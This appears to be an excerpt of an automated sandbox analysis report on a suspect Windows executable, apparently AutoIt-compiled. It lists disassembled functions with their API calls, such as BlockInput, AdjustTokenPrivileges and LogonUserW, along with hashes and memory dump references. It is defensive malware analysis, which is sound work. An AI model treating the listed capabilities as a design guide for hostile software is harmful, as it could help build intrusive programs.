                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: e7fca79fb035a7ca6798352b55c157e414df17df93c25c5ed3971a9b05786bbe
                                                    • Instruction ID: a417b919b8cb6a1d63a28659831bc927a051f1188a1e189b4276dad0158d1352
                                                    • Opcode Fuzzy Hash: e7fca79fb035a7ca6798352b55c157e414df17df93c25c5ed3971a9b05786bbe
                                                    • Instruction Fuzzy Hash: 7EF0823554422DBBDB209FA4CC48FEA776EBF09761F004269B909E6281D6309940CBE1
                                                    Function 00658713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658851), ref: 00658728
                                                    • CloseHandle.KERNEL32(?,?,00658851), ref: 0065873A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: effba51f815404d7141df9c75028cfd4cb9e38c11e350dfcea21c5d1146a20a6
                                                    • Instruction ID: 94b1dfa9620679caf3c479a551f26e6cf6037a248fb844f70753019a46a84f4c
                                                    • Opcode Fuzzy Hash: effba51f815404d7141df9c75028cfd4cb9e38c11e350dfcea21c5d1146a20a6
                                                    • Instruction Fuzzy Hash: D2E04632004A51EFE7212B60FC08D777BAAEB04350B20892DB89680430CB22ACD0DB10
                                                    Function 0062A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00628F97,?,?,?,00000001), ref: 0062A39A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0062A3A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                    • Instruction ID: 1d883a3215d42a99e09cffeced93c567c02d11e6a282e1bbdfda2c2b38d78416
                                                    • Opcode Fuzzy Hash: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                    • Instruction Fuzzy Hash: 50B09231254308BBCB002B91EC09B883F6AEB46AA2F405120F60D84060CF6254508BD1
                                                    Function 0062F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                    • Instruction ID: ee7ea63d449d33365f2c4ca52b36f3001c7c3a147a73f6ae31f8e533ae4eb026
                                                    • Opcode Fuzzy Hash: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                    • Instruction Fuzzy Hash: B7322721D29F114DD7235A34E832336A25EAFB73D4F15E737E819B5EAAEB29C4834500
                                                    Function 0063267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                    • Instruction ID: bbb650e504f9260522b4531f3dcc80b0f75b07f7a88846259a3206b918415001
                                                    • Opcode Fuzzy Hash: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                    • Instruction Fuzzy Hash: 53B1F030D2AF414DD7239A398831336BA9DAFBB6C5F51E71BFC2670D22EB2185834181
                                                    Function 006741FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00674218
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: e80d7b31626d97f4ee6c2439ad50fb207ae61fab4182b40868eb606d925c201a
                                                    • Instruction ID: b8c4018e7ca96c01d2fc4e952dd286a4e5b130c336f15c516729970e1069460d
                                                    • Opcode Fuzzy Hash: e80d7b31626d97f4ee6c2439ad50fb207ae61fab4182b40868eb606d925c201a
                                                    • Instruction Fuzzy Hash: 4BE012312401145FD710AF59D444A9AB7DAAF54760F008019F849C7352DA71A9418BA5
                                                    Function 00664EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00664F18
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 917fae9c328242fced50eeea2f831bab162fef1e373b34c419e32a1baaaaad39
                                                    • Instruction ID: 5ddcf5a298862a10383f71925c8e7aea61fa0f84127b65558737faf40ce24310
                                                    • Opcode Fuzzy Hash: 917fae9c328242fced50eeea2f831bab162fef1e373b34c419e32a1baaaaad39
                                                    • Instruction Fuzzy Hash: FED09EF416460579FD184B20AC2FFB6110BE3D1B91F9459897201965C19CF56861A075
                                                    Function 00658C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006588D1), ref: 00658CB3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                    • Instruction ID: 9b3d629fd4761fee4c5312106b7507c25b69b6e53042291c7c6e86a9f9941d31
                                                    • Opcode Fuzzy Hash: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                    • Instruction Fuzzy Hash: B6D09E3226450EBFEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                    Function 00642230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00642242
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: c9bf59130bc7a708d94990519fd7aa68dc943db37e9dc0787b2253d7eee6c8c5
                                                    • Instruction ID: 87f6b6dce4f9f89e3c6749be290fa0d7989e1132e263b3e9ae7e5cadc7c540ed
                                                    • Opcode Fuzzy Hash: c9bf59130bc7a708d94990519fd7aa68dc943db37e9dc0787b2253d7eee6c8c5
                                                    • Instruction Fuzzy Hash: B9C048F1800109EBDB05DBA0DA98DEEB7BDAB08304F2081A6A102F2100E7749B848B72
                                                    Function 0062A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062A36A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                    • Instruction ID: 74536e93a555ca0174a3be9061235ca17af4f7d0f7f882f9a06e387711d463c8
                                                    • Opcode Fuzzy Hash: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                    • Instruction Fuzzy Hash: D8A0113000020CBB8B002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC0
                                                    Function 00618A0E Relevance: .6, Instructions: 608COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86e7ef17c2e4fdc4a6346c4d1d9f45f106ea414d333ada061bce27894c05cfc6
                                                    • Instruction ID: 169847f1d0297cb28f09be16d1a3ae51f2d62ec058ae5fa9efa1045933318921
                                                    • Opcode Fuzzy Hash: 86e7ef17c2e4fdc4a6346c4d1d9f45f106ea414d333ada061bce27894c05cfc6
                                                    • Instruction Fuzzy Hash: 26221870505656CFDF288B18C4A86FE77A3EB41311F6C446AD8479B392EB349DC6CBA0
                                                    Function 00622405 Relevance: .3, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 7402605ba3319c58c8504afd29a818cad2b6bd54a518ab621940c133c1d05587
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: 05C186322094730ADB2D8639E5341BEBAE25EA37B131A076DE4B3DF6C5EF10D564DA10
                                                    Function 0062283A Relevance: .3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 04734fbc28cd5cbb37c2c52f0e48e82224f21129e59f576f3c3370eb764b373c
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 7CC1B8322095B309DF6D863AA53407EBBE25BA37B131A076DE4B2DF6D4EF10D524DA10
                                                    Function 006837F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0068F910), ref: 006838AF
                                                    • IsWindowVisible.USER32(?), ref: 006838D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: b9227749f85a289787a34ea362c9ff5dc2e2af8a4470a55bfacf50d12302c648
                                                    • Instruction ID: 89d5ba35a9f4f7e3d19949668142ca07d80010d8acaacfe39355351b437257f7
                                                    • Opcode Fuzzy Hash: b9227749f85a289787a34ea362c9ff5dc2e2af8a4470a55bfacf50d12302c648
                                                    • Instruction Fuzzy Hash: DFD17C70204225DFCB54FF10C451AAABBA3AF94744F104A5CB8865B3E3DB71EE4ACB95
                                                    Function 0068A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0068A89F
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068A8D0
                                                    • GetSysColor.USER32(0000000F), ref: 0068A8DC
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0068A8F6
                                                    • SelectObject.GDI32(?,?), ref: 0068A905
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068A930
                                                    • GetSysColor.USER32(00000010), ref: 0068A938
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0068A93F
                                                    • FrameRect.USER32(?,?,00000000), ref: 0068A94E
                                                    • DeleteObject.GDI32(00000000), ref: 0068A955
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0068A9A0
                                                    • FillRect.USER32(?,?,?), ref: 0068A9D2
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068A9FD
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(00000012), ref: 0068AB99
                                                      • Part of subcall function 0068AB60: SetTextColor.GDI32(?,?), ref: 0068AB9D
                                                      • Part of subcall function 0068AB60: GetSysColorBrush.USER32(0000000F), ref: 0068ABB3
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(0000000F), ref: 0068ABBE
                                                      • Part of subcall function 0068AB60: GetSysColor.USER32(00000011), ref: 0068ABDB
                                                      • Part of subcall function 0068AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068ABE9
                                                      • Part of subcall function 0068AB60: SelectObject.GDI32(?,00000000), ref: 0068ABFA
                                                      • Part of subcall function 0068AB60: SetBkColor.GDI32(?,00000000), ref: 0068AC03
                                                      • Part of subcall function 0068AB60: SelectObject.GDI32(?,?), ref: 0068AC10
                                                      • Part of subcall function 0068AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0068AC2F
                                                      • Part of subcall function 0068AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AC46
                                                      • Part of subcall function 0068AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0068AC5B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: f3c20e7270b5078c35426c3f7ee4af8a65b1ef937482d8862f059ee8d984f9cb
                                                    • Instruction ID: c8de3d0604063598ff946ca7035ae3948c0493d9ba12b4a6740e0bf58f66fe82
                                                    • Opcode Fuzzy Hash: f3c20e7270b5078c35426c3f7ee4af8a65b1ef937482d8862f059ee8d984f9cb
                                                    • Instruction Fuzzy Hash: D8A17171008301BFD710AFA4DC08A6B7BAAFF89321F105B2AF962D61E1D775D945CB52
                                                    Function 00602C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00602CA2
                                                    • DeleteObject.GDI32(00000000), ref: 00602CE8
                                                    • DeleteObject.GDI32(00000000), ref: 00602CF3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00602CFE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00602D09
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0063C68B
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063C6C4
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0063CAED
                                                      • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                    • SendMessageW.USER32(?,00001053), ref: 0063CB2A
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063CB41
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB57
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0
                                                    • API String ID: 464785882-4108050209
                                                    • Opcode ID: 1e58717cb66afd725e3824d5760870a68d5cff4831491e20c512cd51d97faf1f
                                                    • Instruction ID: e18e9fca4f440ebd13cf3ba815db83d472a2ce60f6c743f05b0c0528e4b9de26
                                                    • Opcode Fuzzy Hash: 1e58717cb66afd725e3824d5760870a68d5cff4831491e20c512cd51d97faf1f
                                                    • Instruction Fuzzy Hash: E612A330640202EFDB54CF24C899BAAB7E7BF45324F544569F895EB2A2C731EC52CB91
                                                    Function 006777BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 006777F1
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006778B0
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006778EE
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00677900
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00677946
                                                    • GetClientRect.USER32(00000000,?), ref: 00677952
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00677996
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006779A5
                                                    • GetStockObject.GDI32(00000011), ref: 006779B5
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006779B9
